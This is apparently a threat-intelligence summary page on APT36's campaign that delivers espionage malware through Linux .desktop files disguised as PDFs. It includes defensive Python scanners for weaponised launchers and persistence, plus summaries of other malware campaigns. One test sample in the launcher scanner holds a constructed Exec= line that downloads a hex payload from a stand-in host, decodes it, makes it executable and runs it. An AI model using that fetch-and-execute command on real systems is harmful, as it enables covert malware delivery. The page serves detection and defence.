APT36 Linux .desktop File Abuse for Malware Delivery in Ongoing Espionage Campaign
Summary
APT36 (also tracked as Transparent Tribe), a Pakistani cyber espionage group, is abusing Linux .desktop launcher files to deliver malware in attacks targeting government and defense entities in India. The campaign, which began on August 1, 2025, uses phishing emails to distribute ZIP archives containing malicious .desktop files disguised as PDFs. The technique relies on a documented feature rather than a software vulnerability: the 'Exec=' key of a Desktop Entry file is a command line that the desktop environment runs when the launcher is opened, so it can carry an inline shell command that fetches a hex-encoded payload from attacker-controlled servers or Google Drive, decodes it and executes it. The payload is a Go-based ELF executable built for espionage; it establishes persistent access through cron jobs and systemd services, takes steps to stay hidden, and exfiltrates data. Communication with the command and control (C2) server runs over a bi-directional WebSocket channel. APT36 has also been observed targeting Windows and BOSS Linux systems, using spoofed domains and infrastructure hosted on Pakistan-based servers to steal credentials and 2FA codes.
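A triage check for the lure stage described above, added here as an example and not code from the cited articles or from any vendor report. It parses a Desktop Entry file and flags the traits that separate a document-shaped launcher from a real one: an inline shell wrapper in Exec=, download and decode helpers, a chmod on a dropped file, a decoy document opened beside other commands, and a double extension such as .pdf.desktop. The two sample launchers are constructed; the real APT36 file contents, URLs and drop paths are not on this page and are not reproduced.

```python
"""Heuristic scanner for weaponised Linux .desktop launchers.

Added example for this page; it is not code from the cited articles or from
any vendor report. Every sample launcher below is constructed: the real APT36
file contents, URLs and drop paths are not on this page and are not reproduced.
"""
import configparser
import re
import shlex

SHELLS = {"sh", "bash", "dash", "zsh"}
DOWNLOADERS = {"curl", "wget"}
DECODERS = {"xxd", "base64"}                                   # hex / base64 decoders
DOC_VIEWERS = {"xdg-open", "evince", "okular", "firefox", "libreoffice"}
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt"}
SHELL_META = re.compile(r"[\s;|&()`$<>]+")                     # word separators inside sh -c
LONG_HEX = re.compile(r"\b[0-9a-fA-F]{40,}\b")                 # payload embedded inline


def parse_desktop(text):
    """Return the [Desktop Entry] key/value pairs. Keys keep their case and
    interpolation is off so that field codes such as %U do not trip configparser."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str
    cp.read_string(text)
    if not cp.has_section("Desktop Entry"):
        raise ValueError("not a .desktop file: no [Desktop Entry] section")
    return dict(cp["Desktop Entry"])


def exec_words(exec_value):
    """Program names used anywhere in Exec=, looking through sh -c '...' wrappers."""
    try:
        argv = shlex.split(exec_value)
    except ValueError:                                         # unbalanced quotes
        argv = exec_value.split()
    words = set()
    for arg in argv:
        for w in SHELL_META.split(arg):
            if w:
                words.add(w.rsplit("/", 1)[-1])                # drop the directory part
    return words


def suspicious_filename(name):
    """True for a launcher dressed up as a document, e.g. Notice.pdf.desktop."""
    parts = name.lower().split(".")
    return len(parts) >= 3 and parts[-1] == "desktop" and parts[-2] in DOC_EXTS


def analyze(text):
    """Return human-readable findings for one .desktop file (empty list = nothing odd)."""
    entry = parse_desktop(text)
    exec_value = entry.get("Exec", "")
    argv0 = exec_value.split()[0].rsplit("/", 1)[-1] if exec_value.split() else ""
    words = exec_words(exec_value)
    findings = []
    if argv0 in SHELLS and "-c" in words:
        findings.append(f"Exec= runs an inline shell script via {argv0} -c")
    if words & DOWNLOADERS:
        findings.append("Exec= fetches remote content with " + ", ".join(sorted(words & DOWNLOADERS)))
    if words & DECODERS:
        findings.append("Exec= decodes an encoded payload with " + ", ".join(sorted(words & DECODERS)))
    if "chmod" in words:
        findings.append("Exec= changes file permissions, typically to make a dropped file executable")
    if LONG_HEX.search(exec_value):
        findings.append("Exec= embeds a long hex string")
    label = (entry.get("Name", "") + " " + entry.get("Icon", "")).lower()
    looks_like_doc = "pdf" in label or "document" in label
    if looks_like_doc and not words & DOC_VIEWERS:
        findings.append("Launcher is labelled as a document but Exec= opens no viewer")
    elif looks_like_doc and words & (SHELLS | DOWNLOADERS):
        findings.append("Launcher opens a decoy document alongside other commands")
    if argv0 in SHELLS and entry.get("Terminal", "false").lower() == "false":
        findings.append("Shell runs with Terminal=false, so the user sees nothing")
    return findings


# Constructed samples: a lure modelled on the technique described above, and a
# legitimate viewer launcher that must not be flagged.
MALICIOUS = """[Desktop Entry]
Type=Application
Name=Meeting_Notice.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s http://example.invalid/p.txt | xxd -r -p > /tmp/.x; chmod +x /tmp/.x; /tmp/.x & xdg-open /tmp/decoy.pdf"
"""
BENIGN = """[Desktop Entry]
Type=Application
Name=PDF Viewer
Icon=application-pdf
Exec=evince %U
"""

if __name__ == "__main__":
    for name, text in (("Meeting_Notice.pdf.desktop", MALICIOUS), ("evince.desktop", BENIGN)):
        print(name, "(double extension)" if suspicious_filename(name) else "")
        for finding in analyze(text) or ["no findings"]:
            print("  ", finding)
```

Run it over the contents of a suspicious ZIP or over ~/.local/share/applications and ~/Desktop. The findings are heuristics: a genuine launcher can legitimately call a shell, so treat a single hit as a prompt to read the Exec= line, and several hits together as the pattern this campaign uses.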
Timeline
-
25.08.2025 11:13 · 1 article
APT36 Expands Campaign to Include Windows and BOSS Linux Systems
On August 25, 2025, new details emerged about the ongoing APT36 campaign. The group, also known as Transparent Tribe, has expanded its targeting to include both Windows and BOSS Linux systems. The campaign uses phishing emails with meeting notices to deliver malicious .desktop files, which execute a Go-based binary that communicates with a hard-coded C2 server. The malware establishes persistence through a cron job and includes anti-debugging and anti-sandbox checks to evade detection. Additionally, the campaign deploys a known Transparent Tribe backdoor called Poseidon. APT36 has also been observed targeting Indian defense organizations and government entities using spoofed domains and infrastructure hosted on Pakistan-based servers to steal credentials and 2FA codes. The group's tactics include using typo-squatted domains and targeting the Kavach 2FA solution used by Indian government agencies.
- Transparent Tribe Targets Indian Govt With Weaponized Desktop Shortcuts via Phishing · thehackernews.com · 25.08.2025 11:13
-
22.08.2025 21:35 · 2 articles
APT36 Launches Ongoing Linux .desktop File Abuse Campaign
On August 1, 2025, APT36 started a new malware campaign against government and defense entities in India. The campaign uses phishing emails to deliver ZIP archives containing malicious .desktop files disguised as PDFs. These launchers abuse the 'Exec=' field to run shell commands that fetch, decode and execute a hex-encoded payload from attacker-controlled servers or Google Drive. The payload is a Go-based ELF executable designed for espionage, with capabilities for stealth and persistence. Communication with the C2 server is conducted over a bi-directional WebSocket channel. The campaign is ongoing and shows APT36's tactics becoming more evasive and sophisticated.
- APT36 hackers abuse Linux .desktop files to install malware in new attacks · www.bleepingcomputer.com · 22.08.2025 21:35
- Transparent Tribe Targets Indian Govt With Weaponized Desktop Shortcuts via Phishing · thehackernews.com · 25.08.2025 11:13
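The timeline entries above describe persistence through a cron job and, in the summary, systemd services. The following triage script is an added example, not code from the cited articles or from any vendor report: it parses crontab output and a systemd unit and flags jobs that launch from world-writable staging directories or dot-directories, fetch content at run time, or re-arm at @reboot. The crontab, unit file and the heuristics themselves are this example's own constructions, not indicators taken from the campaign.

```python
"""Triage of user-level persistence of the kind described above: cron entries
and systemd service units that launch a binary from a staging location.

Added example for this page; it is not code from the cited articles or from any
vendor report. The crontab and unit file below are constructed, and the
heuristics (staging directories, hidden path components) are this example's
own assumptions, not indicators taken from the campaign.
"""
import re
from pathlib import PurePosixPath

STAGING_DIRS = ("/tmp", "/var/tmp", "/dev/shm")   # world-writable drop locations
NETWORK_TOOLS = {"curl", "wget"}                    # a persisted job should not need these
SEPARATORS = re.compile(r"[\s;|&()`]+")


def command_findings(command):
    """Return the reasons a cron/systemd command line looks like malware persistence."""
    findings = []
    for word in (w for w in SEPARATORS.split(command) if w):
        if word.startswith("/"):
            if any(word.startswith(d + "/") for d in STAGING_DIRS):
                findings.append(f"runs from a staging directory: {word}")
            if any(part.startswith(".") for part in PurePosixPath(word).parts[1:]):
                findings.append(f"hides under a dot-directory or dot-file: {word}")
        if PurePosixPath(word).name in NETWORK_TOOLS:
            findings.append(f"downloads content at run time: {word}")
    return findings


def parse_crontab(text):
    """Yield (schedule, command) for each job in `crontab -l` style output."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                                 # blank, comment or VAR=value line
        if line.startswith("@"):                     # @reboot, @hourly, ...
            schedule, _, command = line.partition(" ")
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue
            schedule, command = " ".join(fields[:5]), fields[5]
        yield schedule, command.strip()


def parse_unit(text):
    """Return the ExecStart command line of a systemd unit (last one wins)."""
    exec_start = ""
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() == "ExecStart":
            exec_start = value.strip().lstrip("-@:+!")   # drop systemd exec prefixes
    return exec_start


def triage(crontab_text, units):
    """Map every suspicious cron job or unit to its findings. `units` is {name: text}."""
    report = {}
    for schedule, command in parse_crontab(crontab_text):
        findings = command_findings(command)
        if findings and schedule == "@reboot":
            findings.append("re-armed at every boot via @reboot")
        if findings:
            report[f"cron: {command}"] = findings
    for name, text in units.items():
        command = parse_unit(text)
        findings = command_findings(command)
        if findings:
            report[f"unit {name}: {command}"] = findings
    return report


# Constructed samples (not the real APT36 artefacts): one legitimate job,
# two jobs and one user unit in the style the summary above describes.
CRONTAB = """# m h dom mon dow command
PATH=/usr/local/bin:/usr/bin:/bin
0 2 * * * /usr/bin/backup --quiet
*/5 * * * * /home/user/.config/.cache/.sysupdate >/dev/null 2>&1
@reboot /tmp/.x
"""
UNIT = """[Unit]
Description=System update helper

[Service]
ExecStart=/home/user/.local/share/.helper
Restart=always

[Install]
WantedBy=default.target
"""

if __name__ == "__main__":
    for item, reasons in triage(CRONTAB, {"sysupdate.service": UNIT}).items():
        print(item)
        for reason in reasons:
            print("   -", reason)
```

Feed it `crontab -l` output for each user plus the unit files under ~/.config/systemd/user and /etc/systemd/system. The path heuristics are deliberately narrow so that package-installed jobs stay quiet; extend STAGING_DIRS to match where your own baseline says nothing should execute from.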
Information Snippets
-
APT36 is targeting government and defense entities in India with a new malware campaign using Linux .desktop files.
First reported: 22.08.2025 21:35 · 2 sources, 2 articles
- APT36 hackers abuse Linux .desktop files to install malware in new attacks · www.bleepingcomputer.com · 22.08.2025 21:35
- Transparent Tribe Targets Indian Govt With Weaponized Desktop Shortcuts via Phishing · thehackernews.com · 25.08.2025 11:13
-
The attacks began on August 1, 2025, and are ongoing.
First reported: 22.08.2025 21:35 · 2 sources, 2 articles
- APT36 hackers abuse Linux .desktop files to install malware in new attacks · www.bleepingcomputer.com · 22.08.2025 21:35
- Transparent Tribe Targets Indian Govt With Weaponized Desktop Shortcuts via Phishing · thehackernews.com · 25.08.2025 11:13
-
The campaign uses phishing emails to deliver ZIP archives containing malicious .desktop files disguised as PDFs.
First reported: 22.08.2025 21:35 · 2 sources, 2 articles
- APT36 hackers abuse Linux .desktop files to install malware in new attacks · www.bleepingcomputer.com · 22.08.2025 21:35
- Transparent Tribe Targets Indian Govt With Weaponized Desktop Shortcuts via Phishing · thehackernews.com · 25.08.2025 11:13
-
The .desktop files abuse the 'Exec=' field to execute shell commands that fetch, decode and run a hex-encoded payload.
First reported: 22.08.2025 21:35 · 2 sources, 2 articles
- APT36 hackers abuse Linux .desktop files to install malware in new attacks · www.bleepingcomputer.com · 22.08.2025 21:35
- Transparent Tribe Targets Indian Govt With Weaponized Desktop Shortcuts via Phishing · thehackernews.com · 25.08.2025 11:13
-
The payload is a Go-based ELF executable designed for espionage, with capabilities for stealth and persistence.
First reported: 22.08.2025 21:35 · 2 sources, 2 articles
- APT36 hackers abuse Linux .desktop files to install malware in new attacks · www.bleepingcomputer.com · 22.08.2025 21:35
- Transparent Tribe Targets Indian Govt With Weaponized Desktop Shortcuts via Phishing · thehackernews.com · 25.08.2025 11:13
-
Communication with the C2 server is conducted over a bi-directional WebSocket channel.
First reported: 22.08.2025 21:35 · 2 sources, 2 articles
- APT36 hackers abuse Linux .desktop files to install malware in new attacks · www.bleepingcomputer.com · 22.08.2025 21:35
- Transparent Tribe Targets Indian Govt With Weaponized Desktop Shortcuts via Phishing · thehackernews.com · 25.08.2025 11:13
-
The campaign shows APT36's tactics evolving, becoming more evasive and sophisticated.
First reported: 22.08.2025 21:35 · 2 sources, 2 articles
- APT36 hackers abuse Linux .desktop files to install malware in new attacks · www.bleepingcomputer.com · 22.08.2025 21:35
- Transparent Tribe Targets Indian Govt With Weaponized Desktop Shortcuts via Phishing · thehackernews.com · 25.08.2025 11:13
Similar Happenings
ChillyHell macOS Backdoor Resurfaces with New Capabilities
The ChillyHell macOS backdoor, first observed in 2022, has resurfaced in a new version. This modular backdoor gives attackers remote access and the ability to drop payloads, brute-force passwords, and evade detection. The malware, disguised as an executable applet, was discovered on VirusTotal and had been publicly hosted on Dropbox since 2021. It employs multiple persistence mechanisms and communicates over several protocols, which makes it highly flexible. It can exfiltrate data, drop additional payloads, and enumerate user accounts. Apple has revoked the notarization of the developer certificates associated with the malware. The resurgence of ChillyHell highlights the growing threat to macOS and the need for robust security measures. Separately, a new Go-based remote access trojan (RAT) named ZynorRAT has been discovered targeting Windows and Linux systems; ZynorRAT uses a Telegram bot for command and control and supports a wide range of functions, including file exfiltration and system enumeration.
APT28 deploys NotDoor backdoor via Microsoft Outlook
APT28, a Russian state-sponsored threat group, has been using a new backdoor called NotDoor that turns Microsoft Outlook into a covert channel for communication, data exfiltration, and malware delivery. NotDoor is a VBA macro that monitors incoming emails for specific trigger words; when triggered, it lets attackers exfiltrate data, upload files, and execute commands on the victim's computer. The malware is delivered through a legitimate signed binary, Microsoft's OneDrive.exe, which is vulnerable to DLL sideloading. The backdoor was identified by researchers from Lab52, the threat intelligence arm of the Spanish cybersecurity firm S2 Grupo. It has been deployed against companies in NATO member countries, using advanced techniques to evade detection and maintain persistence. NotDoor supports multiple commands for data exfiltration and file uploads, and uses Base64-encoded PowerShell commands for various operations. It creates a staging folder in the %TEMP% directory to store files for exfiltration, encoding them with custom encryption before sending them via email. APT28's attacks also abuse Microsoft Dev Tunnels for C2 infrastructure, which provides stealth and rapid infrastructure rotation, and the attack chain uses bogus Cloudflare Workers domains to distribute additional payloads, demonstrating a high level of specialized design and obfuscation.
MixShell Malware Targets U.S. Supply Chain Manufacturers via Contact Forms
A sophisticated social engineering campaign dubbed ZipLine targets U.S. supply chain manufacturers with MixShell in-memory malware. Attackers initiate contact through companies' public 'Contact Us' forms, building trust over weeks before delivering malicious ZIP files. The campaign spans multiple sectors and countries, including Singapore, Japan, and Switzerland. The malware uses in-memory execution, DNS-based command-and-control (C2), and advanced evasion techniques. It exploits legitimate services like Heroku to blend with normal network activity, posing severe risks including intellectual property theft and supply chain disruptions. The threat actors use abandoned or dormant domains with legitimate business histories to bypass security filters and gain trust. The fake company websites used by attackers are cloned from a single template, featuring stock images of White House butlers as supposed founders. The malicious ZIP file contains real PDF and DOCX files related to the discussion topic, hosted on a Heroku subdomain.
Global Phishing Campaign Installs RATs via Malicious Scripts
A rapidly spreading phishing campaign targets Windows users worldwide, stealing credentials and deploying remote access trojans (RATs) via malicious scripts. The campaign is particularly impacting organizations in manufacturing, technology, healthcare, construction, and retail/hospitality sectors. The attack begins with socially engineered emails leading to personalized phishing pages, which deliver JavaScript files acting as droppers for UpCrypter malware. This malware deploys various RATs, including PureHVNC, DCRat, and Babylon RAT, providing long-term access to the compromised networks. The campaign has shown rapid growth, with detection counts doubling in just two weeks. The attack chain involves obfuscated scripts, personalized phishing pages, and sophisticated evasion techniques to avoid detection. The use of ready-made tools and phishing kits from underground sites contributes to the campaign's complexity and spread. Additionally, attackers are exploiting legitimate services like Google Classroom, Microsoft 365, and OneNote for phishing campaigns, and using client-side evasion techniques to bypass defenses. Defenders are advised to implement multi-layered defenses, including strong email filters, employee training, and up-to-date security tools.
New Android spyware targeting Russian business executives
A new Android malware named Android.Backdoor.916.origin is targeting executives of Russian businesses. The spyware masquerades as antivirus software from the Russian Federal Security Services (FSB) and the Central Bank of the Russian Federation. It has been in development since January 2025, with multiple versions released. The malware can snoop on conversations, stream from the phone's camera, log user input, and exfiltrate communication data from messenger apps. It requests extensive permissions and connects to a command and control (C2) server to execute various malicious commands. The malware has been observed using multiple branding attempts, including 'GuardCB' and 'SECURITY_FSB.' It mimics genuine security tools to prevent removal and simulates fake detections during scans. The malware is designed for resilience, capable of switching between up to 15 hosting providers.